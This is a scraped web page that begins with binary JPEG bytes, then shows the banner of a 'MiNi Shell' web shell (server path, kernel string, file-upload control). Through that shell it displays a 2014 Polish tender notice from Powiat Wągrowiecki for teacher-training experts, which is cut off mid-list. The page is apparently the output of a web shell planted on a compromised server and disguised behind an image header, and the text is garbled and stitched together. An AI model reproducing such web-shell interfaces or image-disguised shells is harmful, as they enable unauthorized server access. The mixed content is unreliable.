JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140109/9582-N-2014.html

<p class="kh_header"><b>Wągrowiec: Usługi ekspertów na potrzeby procesu doskonalenia nauczycieli i dyrektorów szkół/przedszkoli w Powiecie Wągrowieckim w roku szkolnym 2013/2014 (Obszary wsparcia: Wspieranie pracy wychowawców klas - bezpieczna szkoła; Postawy uczniowskie. Jak je kształtować?; Uczeń jako aktywny uczestnik procesu edukacyjnego; Rodzice są partnerami szkoły)</b><br>
<b>Numer ogłoszenia: 9582 - 2014; data zamieszczenia: 09.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wągrowiecki , ul. Kościuszki 15, 62-100 Wągrowiec, woj. wielkopolskie, tel. 67 2680500, faks 67 2627888.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wagrowiec.pl, www.bip.wagrowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ekspertów na potrzeby procesu doskonalenia nauczycieli i dyrektorów szkół/przedszkoli w Powiecie Wągrowieckim w roku szkolnym 2013/2014 (Obszary wsparcia: Wspieranie pracy wychowawców klas - bezpieczna szkoła; Postawy uczniowskie. Jak je kształtować?; Uczeń jako aktywny uczestnik procesu edukacyjnego; Rodzice są partnerami szkoły).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi ekspertów na potrzeby procesu doskonalenia nauczycieli i dyrektorów szkół przedszkoli w Powiecie Wągrowieckim w roku szkolnym 2013-2014 w zakresie przeprowadzenia warsztatów, wykładów, konsultacji grupowych i spotkań w ramach projektu - System wsparcia szkół i przedszkoli w Powiecie Wągrowieckim - nowoczesne doskonalenie nauczycieli - Program Operacyjny Kapitał Ludzki 2007-2013.
Przedmiot zamówienia został podzielony na 8 części (zadań):
Zadanie nr 1. Realizacja Rocznego Planu Wspomagania w Zasadniczej Szkole Zawodowej wchodzącej w skład Zespołu Szkół Ponadgimnazjalnych w Gołańczy.
Zadanie nr 2. Realizacja Rocznego Planu Wspomagania w Zasadniczej Szkole Zawodowej wchodzącej w skład Zespołu Szkół w Damasławku.
Zadanie nr 3. Realizacja Rocznego Planu Wspomagania w Zespole Szkół Zawodowych wchodzących w skład Zespołu Szkół Ponadgimnazjalnych nr 1 w Wągrowcu.
Zadanie nr 4. Realizacja Rocznego Planu Wspomagania w Szkole Podstawowej wchodzącej w skład Zespołu Szkół w Smogulcu.
Zadanie nr 5. Realizacja Rocznego Planu Wspomagania w Szkole Podstawowej w Łeknie wchodzącej w skład Zespołu Szkolno - Przedszkolnego w Łeknie.
Zadanie nr 6. Realizacja Rocznego Planu Wspomagania w Szkole Podstawowej wchodzącej w skład Zespołu Szkół w Gołańczy.
Zadanie nr 7. Realizacja Rocznego Planu Wspomagania w Gimnazjum Nr 3 w Rąbczynie.
Zadanie nr 8. Realizacja Rocznego Planu Wspomagania w Szkole Podstawowej w Jabłkowie.
Szczegółowy opis przedmiotu zamówienia wraz ze specyfikacją każdego zadania zawarty został w Załączniku nr 6 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia osobami zdolnymi wykonać zamówienie, tj. posiadających następujące wykształcenie, doświadczenie i kwalifikacje:
Dla wszystkich 8 zadań osoby, które będą wykonywać zamówienie (tzw. eksperci) powinni posiadać:	doświadczenie w pracy z grupą osób dorosłych min. 80 godzin (np. moderowanie grupowej pracy koncepcyjnej, kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów, prowadzenie szkoleń, warsztatów, wykłady, konsultacje, inne formy spotkań grupowych) lub jest trenerem, szkoleniowcem, wykładowcą, konsultantem, ekspertem w danej dziedzinie; oraz dodatkowo:
Zadanie nr 1 - Ekspert. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia  lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu trudnej klasy i trudnego ucznia, wpływu rodziny na usamodzielnianie się dziecka, psychiki ucznia w wieku dorastania, agresji wśród ludzi, efektywnej komunikacja: nauczyciel - uczeń, nauczyciel - rodzic, nauczyciel - nauczyciel, asertywności, kreatywnego rozwiązania konfliktów;
c) minimum 10 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 10 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu trudnej klasy i trudnego ucznia, wpływu rodziny na usamodzielnianie się dziecka, psychiki ucznia w wieku dorastania, agresji wśród ludzi, efektywnej komunikacja: nauczyciel - uczeń, nauczyciel - rodzic, nauczyciel - nauczyciel, asertywności, kreatywnego rozwiązania konfliktów.
Zadanie nr 2 - Ekspert nr 1. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli lub wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego 
w rozumieniu ww. przepisów;
b) ukończenie co najmniej jednego kursu lub innej formy  doskonalenia zawodowego 
z zakresu wspierania pracy wychowawców;
c) minimum 10 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 10 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu wspierania pracy wychowawców.
Zadanie nr 2 - Ekspert nr 2. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy  doskonalenia zawodowego 
z zakresu komunikacji interpersonalnej; 
c) minimum 10 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 10 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu komunikacji interpersonalnej
Zadanie nr 3 - Ekspert nr 1. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu prawa oświatowego;
c) minimum 5 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 10 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu prawa oświatowego.
Zadanie nr 3 - Ekspert nr 2. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia  lub ukończonego zakładu kształcenia nauczycieli lub wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego 
w rozumieniu ww. przepisów;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu metod pracy z grupą;
c) minimum 5 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 10 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu metod pracy z grupą.
Zadanie nr 4 - Ekspert nr 1. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego z zakresu rozwijania umiejętności komunikacji interpersonalnych oraz rozwiązywania konfliktów 
w szkole;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 3 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu rozwijania umiejętności komunikacji interpersonalnych oraz rozwiązywania konfliktów w szkole.
Zadanie nr 4 - Ekspert nr 2. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu trudnych zachowań uczniów, współpracy z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów, planowania i wdrażania pracy wychowawczej, budowania (modyfikowania) wizji i misji szkoły oraz określania modelu absolwenta;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 3 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu trudnych zachowań uczniów, współpracy z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów, planowania i wdrażania pracy wychowawczej, budowania (modyfikowania) wizji i misji szkoły oraz określania modelu absolwenta;
e) ukończony kurs lub studia podyplomowe z zakresu organizacji i zarządzania oświatą.
Zadanie nr 5 - Ekspert nr 1. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego z zakresu rozwijania umiejętności komunikacji interpersonalnych oraz rozwiązywania konfliktów 
w szkole;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 3 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu rozwijania umiejętności komunikacji interpersonalnych oraz rozwiązywania konfliktów w szkole.
Zadanie nr 5 - Ekspert nr 2. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu trudnych zachowań uczniów, współpracy z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów, planowania i wdrażania pracy wychowawczej, budowania (modyfikowania) wizji i misji szkoły oraz określania modelu absolwenta;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 3 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu trudnych zachowań uczniów, współpracy z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów, planowania i wdrażania pracy wychowawczej, budowania (modyfikowania) wizji i misji szkoły oraz określania modelu absolwenta;
e) ukończony kurs lub studia podyplomowe z zakresu organizacji i zarządzania oświatą.
Zadanie nr 5 - Ekspert nr 3. Minimalna ilość osób: 1.
a) wykształcenie wyższe II stopnia prawnicze;
b) zrealizowanie min. 3 form doskonalenia (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) prawnych możliwości reagowania na niewłaściwe postawy uczniów.
Zadanie nr 6 - Ekspert nr 1. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli lub wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego 
w rozumieniu ww. przepisów;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego z zakresu efektywnego uczenia, metod aktywizujących w szkole podstawowej, motywowania ucznia do nauki, pracy z uczniem ze szczególnymi potrzebami edukacyjnymi, efektywnej komunikacja: nauczyciel - uczeń, nauczyciel - rodzic, nauczyciel - nauczyciel, myślenia krytycznego i naukowego (wnioskowanie, analiza tekstu, rozumienie problemowe);
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 5 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu efektywnego uczenia, metod aktywizujących w szkole podstawowej, motywowania ucznia do nauki, pracy z uczniem ze szczególnymi potrzebami edukacyjnymi, efektywnej komunikacja: nauczyciel - uczeń, nauczyciel - rodzic, nauczyciel - nauczyciel, myślenia krytycznego i naukowego (wnioskowanie, analiza tekstu, rozumienie problemowe).
Zadanie nr 6 - Ekspert nr 2. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu technik uczenia się i zapamiętywania oraz technik szybkiego czytania.
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 5 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu technik uczenia się i zapamiętywania oraz technik szybkiego czytania.
Zadanie nr 7 - Ekspert nr 1. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego z zakresu rozwijania umiejętności komunikacji interpersonalnych, radzenia sobie w sytuacjach stresowych oraz asertywności;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 3 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z rozwijania umiejętności komunikacji interpersonalnych, radzenia sobie 
w sytuacjach stresowych oraz asertywności.
Zadanie nr 7 - Ekspert nr 2. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu współpracy rodziców z nauczycielami oraz ze szkołą jako instytucją, form działań integracyjnych i pretekstów wizyt rodziców w szkole, prowadzenia spotkań z rodzicami oraz diagnozowania potrzeb rodziców;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 3 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu współpracy rodziców z nauczycielami oraz ze szkołą jako instytucją, form działań integracyjnych i pretekstów wizyt rodziców w szkole, prowadzenia spotkań 
z rodzicami oraz diagnozowania potrzeb rodziców;
e) ukończony kurs lub studia podyplomowe z zakresu organizacji i zarządzania oświatą.
Zadanie nr 8 - Ekspert nr 1. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli lub wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego 
w rozumieniu ww. przepisów;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu diagnozy potrzeb rodziców i uczniów, budowania autorytetu nauczyciela i rodzica, form działań integracyjnych, diagnozowania potrzeb uczniów i rodziców;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
